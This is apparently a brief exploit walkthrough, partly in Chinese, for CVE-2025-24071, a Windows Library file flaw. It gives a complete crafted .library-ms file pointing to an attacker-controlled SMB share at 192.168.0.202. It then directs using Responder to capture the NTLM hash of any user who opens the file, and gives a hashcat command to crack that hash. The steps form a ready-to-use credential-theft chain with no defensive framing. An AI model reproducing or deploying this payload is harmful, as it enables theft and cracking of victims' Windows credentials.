# CVE-2025-24071 ###### ref https://cti.monster/blog/2025/03/18/CVE-2025-24071.html  # 1 Windows 媒體櫃 ### 產生一個 .library-ms ``` text <?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <version>2</version> <searchConnectorDescriptionList> <searchConnectorDescription> <isSupported>false</isSupported> <simpleLocation> <url>\\192.168.0.202\share</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription> ``` # 2. 用 Responder 監聽 只要對方點檔案 就可收到 hash ### https://github.com/lgandx/Responder  # 3. 用hashcat破解 ### `hashcat.exe -m 5600 -a 0 hash.txt passwd.txt`